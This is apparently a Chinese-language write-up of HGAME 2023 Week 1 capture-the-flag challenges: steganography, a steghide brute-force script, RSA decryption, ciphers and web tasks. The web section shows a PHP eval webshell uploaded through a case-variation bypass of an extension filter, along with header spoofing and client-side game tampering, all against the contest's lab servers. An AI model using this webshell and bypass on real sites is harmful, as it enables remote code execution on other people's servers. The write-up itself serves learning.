Week1

misc

签到

base64

hgame{Welcome_To_HGAME2023!}

e99p1ant_want_girlfriend

改图片size

img

神秘的海报

LSB RGB0得到

Sure eno ugh, you still r emember what we  talked about at  that time! This  is part of the s ecret: `hgame{U_ Kn0w_LSB&W`.I pu t the rest of th e content here,  https://drive.go ogle.com/file/d/ 13kBos3Ixlfwkf3e 0z0kJTEqBxm7RUk- G/view?usp=shari ng, if you direc tly access the g oogle drive clou d disk download  in China, it wil l be very slow,  you can try to u se Scientific In ternet access so lves the problem  of slow or inac cessible access  to external netw ork resources. T his is my favori te music, there  is another part  of the secret in  the music, I us e Steghide to en crypt, the passw ord is also the  6-digit password  we agreed at th e time, even if  someone else fin ds out here, it  should not be so  easy to crack ( ( hope so

得到前半截flag是

hgame{U_ Kn0w_LSB&W,后半截去谷歌云盘下

提示是steghide加密,密码6位,于是生成字典

crunch 6 6 0123456789 -o 6dig.txt

然后跑之前抄来的steghide暴破脚本

#! /bin/python3
from subprocess import *

def foo():
    stegoFile='Bossnova.wav'
    extractFile='passwd.txt'#爆破的密码
    passFile='6dig.txt'#字典

    errors=['could not extract','steghide --help','Syntax error']
    cmdFormat='steghide extract -sf "%s" -xf "%s" -p "%s"'
    f=open(passFile,'r')

    for line in f.readlines():
        cmd=cmdFormat %(stegoFile,extractFile,line.strip())
        p=Popen(cmd,shell=True,stdout=PIPE,stderr=STDOUT)
        content=str(p.stdout.read(),'gbk')
        for err in errors:
            if err in content:
                break
        else:
            print (content),
            print ('the passphrase is %s' %(line.strip()))
            f.close()
            return

if __name__ == '__main__':
    foo()
    print ('ok')
    pass

跑一会儿得到密码123456

后来看官方wp出题人居然说6位先试123456,啊这……

img

hgame{U_Kn0w_LSB&Wav^Mp3_Stego}

where i am

导出http对象,得到一个压缩包,winrar打开,有密码,且提示文件头受损

img

img

现在是想修复了rar然后再暴破,但是我好困,等会睡醒了再找找怎么修复rar吧。

原来是我的010editor的模板版本太老了,没解析出来,现在我们可以解析出来,然后发现header的crc不对

img

把crc改回去就不报错了,然后猜测是rar伪加密,把Exchangeable的那啥改了

img

解压出来了jpg,用exiftools查看exif信息

img

根据题目,flag是hgame{116_24_1488_E_39_54_5418_N}

crypto

RSA

factordb分解大数得到

p =  11239134987804993586763559028187245057652550219515201768644770733869088185320740938450178816138394844329723311433549899499795775655921261664087997097294813
q =  12022912661420941592569751731802639375088427463430162252113082619617837010913002515450223656942836378041122163833359097910935638423464006252814266959128953

知道p、q、e,解密

import gmpy2

p =  11239134987804993586763559028187245057652550219515201768644770733869088185320740938450178816138394844329723311433549899499795775655921261664087997097294813
q =  12022912661420941592569751731802639375088427463430162252113082619617837010913002515450223656942836378041122163833359097910935638423464006252814266959128953
e =  65537
c =  110674792674017748243232351185896019660434718342001686906527789876264976328686134101972125493938434992787002915562500475480693297360867681000092725583284616353543422388489208114545007138606543678040798651836027433383282177081034151589935024292017207209056829250152219183518400364871109559825679273502274955582

n=p*q
phi=(p-1) * (q-1)
d = gmpy2.invert(e,phi) # 通过e和phi求d
m = gmpy2.powmod(c,d,n) # 通过d和n解密
print(m)
print(hex(m)[2:])                      #16进制明文
print(bytes.fromhex(hex(m)[2:]))       #16进制转文本

神秘的电话

吧morse拖到au里,然后手打杠丶

----- ..--- ..--- ...-- . ..--.- .--. .-. .. .. -... .-.. -.-- ..--.- ..--.- .... --- -. .-- .- ..--.- .--- -- --. .... ..--.- ..-. --. -.- -.-. --.- .- --- --.- - -- ..-. .-.

得到

0223E_PRIIBLY__HONWA_JMGH_FGKCQAOQTMFR

然后另一个txt里面base64解码,得到

几个星期前,我们收到一个神秘的消息。但是这个消息被重重加密,我们不知道它的真正含义是什么。唯一知道的信息是关于密钥的:“只有倒着翻过十八层的篱笆才能抵达北欧神话的终点”。

倒着(reverse):rfmtqoaqckgfhgmjawnohylbiirpe3220

十八层(ROT18):eszgdbndpxtsutzwnjabulyovvecr8775

篱笆(Fence):

tmd,什么玩意儿啊

看了wp,18层是维吉尼亚18,您?

1674014601752

web

Become A Member

请求头的问题,用bp抓包

GET / HTTP/1.1
Host: week-1.hgame.lwsec.cn:31614
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Cute-Bunny
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, Vidar
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Cookie: code=Vidar
Referer: bunnybunnybunny.com
X-Forwarded-For: 127.0.0.1
Content-Length: 54

{"username": "luckytoday", "password": "happy123"}

还以为是自定义了code字段要让他为Vidar

Classic Childhood Game

不会有人打不通魔塔8层吧

img

没错,我不会,单机开挂谁喷我谁司马好吗?

source里找到core.js,但我ctrl+F没找到获胜的逻辑,开始暴躁审计,看到一半直接改

img

img

去超市买防御和攻击或者吃宝石,不论是啥都加1k,钱越花越多,钥匙越开越多,一路平推,得到flag

后来看wp,发现结束的逻辑在res/event.js

1674011391526

直接在控制台里打mota()就得了

注意看,这个mota()函数经过了乱七八糟的混淆

1674011670096

解混淆的事儿,下次再说儿

Show Me Your Beauty

一个上传头像,并且告诉你头像上传到了./img/*的位置

所以写一个一句话<?php @eval($_POST['pillar']); ?>

然后上传,发现前端过滤了文件后缀名,于是改后缀名为jpg,抓包再改为php,然后发现后端也有过滤,尝试一些其他的后缀名,包括php5、php4、phtml,发现都不太行

1674014097002

尝试大小写绕过,发现可以

1674014135823

然后访问一下,发现也可以访问到

1674014205289

然后蚁剑连接,在根目录下获得flag

1674014233428

Guess Who I Am

根据hint,到https://github.com/Potat0000/Vidar-Website/blob/master/src/scripts/config/member.js获取成员名单

本来看这js直接export default了,寻思学习学习,拿js写个脚本试试,但是感觉nodejs环境属实有点8行,一会儿commonjs一会儿es6的搞得我有丶晕,回归舒适区吧

import requests

fp = open('./member.js', 'rb')

id_tmp=""
intro_tmp=""
dic={}

for line in fp.readlines():
	if b'"id"' in line:
		id_tmp = line.decode().replace(' ','')[6:-4]
	if b'"intro"' in line:
		intro_tmp = line.decode().replace(' ','')[9:-4]
		dic[intro_tmp] = id_tmp
		id_tmp = ""
		intro_tmp = ""

fp.close()

session = requests.session()
url='http://week-1.hgame.lwsec.cn:30128/api/getQuestion'
resp = session.get(url)
cookies = resp.cookies.get_dict()
res=dic[resp.content.decode()[12:-2].replace("\\u0026","&").replace(' ','')]

for i in range(100):
	url1="http://week-1.hgame.lwsec.cn:30128/api/verifyAnswer"
	data = {"id": res}
	resp1 = session.post(url1, cookies = cookies, data = data)
	print(resp1.text)
	cookies = resp1.cookies.get_dict()
	url2="http://week-1.hgame.lwsec.cn:30128/api/getScore"
	resp2 = session.get(url2, cookies = cookies)
	print(resp2.text)
	cookies = resp2.cookies.get_dict()
	url='http://week-1.hgame.lwsec.cn:30128/api/getQuestion'
	resp = session.get(url,cookies = cookies)
	cookies = resp.cookies.get_dict()
	res=dic[resp.content.decode()[12:-2].replace("\\u0026","&").replace(' ','')]

img